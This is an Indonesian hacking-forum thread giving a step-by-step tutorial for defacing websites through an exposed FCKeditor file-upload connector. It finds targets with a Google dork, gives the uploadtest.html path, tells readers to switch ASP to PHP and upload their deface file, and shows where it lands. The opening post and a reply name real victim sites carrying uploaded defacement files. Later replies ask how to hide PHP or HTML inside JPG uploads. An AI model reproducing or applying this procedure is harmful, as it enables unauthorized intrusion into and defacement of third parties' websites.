http://iht.or.id/10695
Page 1 of 2 12 LastLast
Results 1 to 10 of 19
  1. #1

    Deface dengan FCK Editor

    Mungkin para mastah udah tau, ya udah lewat aja, kalau repost maaf ya, bisa di close atau di buang aja... hehehe...

    Deface dengan cara ini hanya bisa digunakan untuk format .txt (text)
    1. Cari target dengan Google Dork:
    Code:
    Code:
    inurl:/apps/fckeditor/
    2. Pilih salah satu target yg muncul pada google.
    e.x:
    http://www.joblist.co.uk/apps/fckeditor/2.5.1/editor/filemanager/connectors/perl/
    3. Exploitnya, maka ganti url yang berwarna merah dengan Code:
    Code:
    /apps/fckeditor/2.5.1/editor/filemanager/connectors/uploadtest.html
    jadinya :
    Code: 4.Kalo udah masuk, maka ganti ASP jadi PHP

    5.Siapin file deface kita yg berformat .txt

    6. Klik Browse dan cari file deface kita yg udah disiapin tadi.

    7. Terakhir ... klik "Send it to the Server"

    ============================

    Untuk melihat file deface kita kasih exploit dibawah ini tepat dibelakang situs target.
    Code:
    /userfiles/16/namafile.txt

    jadinya seperti ini :
    Code:
    http://target.com/userfiles/16/namafile.txt

    =============================

    Mungkin deface'nya terlihat simple, tapi coba lihat efeknya ... BEBERAPA link yg muncul pada google dengan dork diatas ... secara otomatis akan langsung terdeface dengan sendirinya ...

    =============================

    ini contoh punya saya.

    Code:
    http://www.joblist.co.uk/userfiles/16/dot%281%29.txt

    =============================



    Note: saya dapat ilmu ini dari forum sebelah.. hehehe...
    Reply With Quote Reply With Quote

  2. Who Said Thanks:

    Meseprads (16-07-2013) , Unkrfajg (04-07-2013) , tebpwsqfyv (27-06-2013) , opinyfap (08-06-2013) , CroViFFF (17-12-2012)

  3. #2
    Reply With Quote Reply With Quote

  4. Who Said Thanks:

    Lypeexipica (18-07-2013) , idedsiscime (17-07-2013) , broorneAntimi (17-07-2013) , riskJismats (16-07-2013) , Labdaundswida (16-07-2013) , moleWetly (06-07-2013) , fluilmilk (02-07-2013) , amummaGok (02-07-2013)

  5. #3
    Soldiers Moslem Zoe Far's Avatar
    Join Date
    May 2012
    Location
    in your heart , hehe
    Posts
    657
    Thanks
    7 / 6,679
    bisa om , tapi kelihatanya hack seperti ini tidak terlalu sulit seperti bayang" gw

    http://perplexed.co.uk/userfiles/16/awas.txt

    ane mah bisa upload berapapun kalau gini
    Reply With Quote Reply With Quote

  6. Who Said Thanks:

    matNarsmeatty (02-07-2013) , Gqqubgkaq (11-06-2013) , Spanceassebra (07-06-2013) , MefsCereDrase (06-06-2013) , Krzrynmu (06-06-2013) , SongBook (21-12-2012) , uggsmx (17-12-2012)

  7. #4
    fadly , kamu itu nakal ya , makannya contoh tuh sih zoe far
    Apaan nih maksudnya... hahaha...
    Reply With Quote Reply With Quote

  8. Who Said Thanks:

    joficomia (11-06-2014) , orierryDriete (17-07-2013) , nusyImpossy (17-07-2013) , impopeaminc (16-07-2013) , SellasesTaddy (16-07-2013) , Shushhepnug (16-07-2013) , BleassyImmaby (15-07-2013) , uicebihuhusug (02-07-2013) , amummaGok (02-07-2013) , tebpwsqfyv (27-06-2013) , Spanceassebra (07-06-2013)

  9. #5
    saya masih bingung cara kerjanya
    kasi pencerahan dong agan2 yang baik soalnya pas saya ketik alamat ini di google :


    (inurl:/apps/fckeditor/) malah keluar bacaan gini:
    (fire fox tidak dapat mengatahui cara membuka alamat ini
    karna protocol alamat (inurl) tidak terkait dengan program apapun.)
    Reply With Quote Reply With Quote

  10. Who Said Thanks:

    Bqxmicid (22-07-2013) , Zlxioefqg (18-07-2013) , Duefoffer (17-07-2013) , Bocaizocant (06-07-2013) , ClamHarma (04-07-2013) , Klzszkmwtb (15-06-2013) , diqpbiges (06-06-2013)

  11. #6
    Junior Member
    Adm22777's Avatar
    Join Date
    Jun 2012
    Location
    Franklin, Tennessee, United States
    Posts
    87
    Thanks
    7 / 944
    Quote Originally Posted by --DnnadanZ-- View Post
    saya masih bingung cara kerjanya
    kasi pencerahan dong agan2 yang baik soalnya pas saya ketik alamat ini di google :


    (inurl:/apps/fckeditor/) malah keluar bacaan gini:
    (fire fox tidak dapat mengatahui cara membuka alamat ini
    karna protocol alamat (inurl) tidak terkait dengan program apapun.)
    mungkin salah itu gan,,,, coba buka google.co.id dulu, baru paste...
    Reply With Quote Reply With Quote

  12. Who Said Thanks:

    joficomia (25-05-2014) , leloszki (18-07-2013) , guageouse (17-07-2013) , Abotinoxith (17-07-2013) , Buinnance (28-06-2013) , evexnorgo (15-06-2013) , Attaxfal (06-06-2013)

  13. #7
    Quote Originally Posted by Technomha Aznesse View Post
    Mungkin para mastah udah tau, ya udah lewat aja, kalau repost maaf ya, bisa di close atau di buang aja... hehehe...

    Deface dengan cara ini hanya bisa digunakan untuk format .txt (text)
    1. Cari target dengan Google Dork:
    Code:
    Code:
    inurl:/apps/fckeditor/
    2. Pilih salah satu target yg muncul pada google.
    e.x:

    3. Exploitnya, maka ganti url yang berwarna merah dengan Code:
    Code:
    /apps/fckeditor/2.5.1/editor/filemanager/connectors/uploadtest.html
    jadinya :
    Code:

    4.Kalo udah masuk, maka ganti ASP jadi PHP

    5.Siapin file deface kita yg berformat .txt

    6. Klik Browse dan cari file deface kita yg udah disiapin tadi.

    7. Terakhir ... klik "Send it to the Server"

    ============================

    Untuk melihat file deface kita kasih exploit dibawah ini tepat dibelakang situs target.
    Code:
    /userfiles/16/namafile.txt

    jadinya seperti ini :
    Code:
    http://target.com/userfiles/16/namafile.txt

    =============================

    Mungkin deface'nya terlihat simple, tapi coba lihat efeknya ... BEBERAPA link yg muncul pada google dengan dork diatas ... secara otomatis akan langsung terdeface dengan sendirinya ...

    =============================

    ini contoh punya saya.

    Code:
    http://www.joblist.co.uk/userfiles/16/dot%281%29.txt

    =============================



    Note: saya dapat ilmu ini dari forum sebelah.. hehehe...
    bisa dipake buat upload gambar juga gan, bukan cuma file text..
    Nah sekarang siapa yg bisa injeksi PHp ato Html ke file jpg? Gw nyoba gagal mulu
    Reply With Quote Reply With Quote

  14. Who Said Thanks:

    leloszki (18-07-2013) , IGNOGUEBIOTHE (18-07-2013) , gobreNeef (17-07-2013) , tebpwsqfyv (27-06-2013) , Scattehathowl (25-06-2013) , ayuwgwedzjOI (07-06-2013) , JarAddita (06-06-2013) , imoysgun (06-06-2013)

  15. #8
    saya belum pernah coba tuh pake gambar.. hehehe... kalo HTMLnya mau jadi jpg tinggal screen shot aja gan, terus di crop pagenya kalo mau yang bergerak bikin aja pake flash nantikan formatnya .gif

    Update:

    ternyata bisa gan pake gambar juga, tinggal ganti aja ASP jadi PHP, terus yang sebelah kirinya ganti juga sama imaga, upload dah...
    Last edited by Technomha Aznesse; 11-07-2012 at 13:37.
    Reply With Quote Reply With Quote

  16. Who Said Thanks:

    Meseprads (16-07-2013) , traisteemalty (08-07-2013) , Ryejxiuye (03-07-2013) , usixolu (06-06-2013) , xesforumgrc (25-12-2012)

  17. #9
    Soldiers Moslem Hasan's Avatar
    Join Date
    Dec 2012
    Location
    AnyWhere
    Posts
    361
    Thanks
    2 / 2,833
    mkasih kak infonya

    cara defacenya ok
    tapi kayak bukan deface yang sebenarnya kak
    Reply With Quote Reply With Quote

  18. Who Said Thanks:

    bamentenenuth (16-07-2013) , RoorGravy (06-06-2013)

  19. #10
    Reply With Quote Reply With Quote

  20. Who Said Thanks:

    abubrepense (17-07-2013) , lfxhmyfd2 (16-07-2013) , feleapNagmalk (14-07-2013) , ziplifeexelty (06-07-2013) , Orerryorgacle (04-07-2013) , Zexunda (02-07-2013) , oxisepu (02-07-2013) , SongBook (20-12-2012)

Page 1 of 2 12 LastLast

Similar Threads

  1. TUTORIAL Cara Deface Index Website dengan Webdav For Newbie
    By Dwisatrias in forum Web Hacking
    Replies: 76
    Last Post: 02-05-2014, 16:18
  2. Replies: 16
    Last Post: 25-07-2012, 00:40
  3. cara deface web dengan SQLI Helper
    By Alvin Yulialdi in forum Newbie Corner
    Replies: 41
    Last Post: 24-08-2011, 23:47
  4. deface website dengan backdoor ( NEWBIE )
    By darkC0de in forum Show Off
    Replies: 11
    Last Post: 23-08-2011, 04:53

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •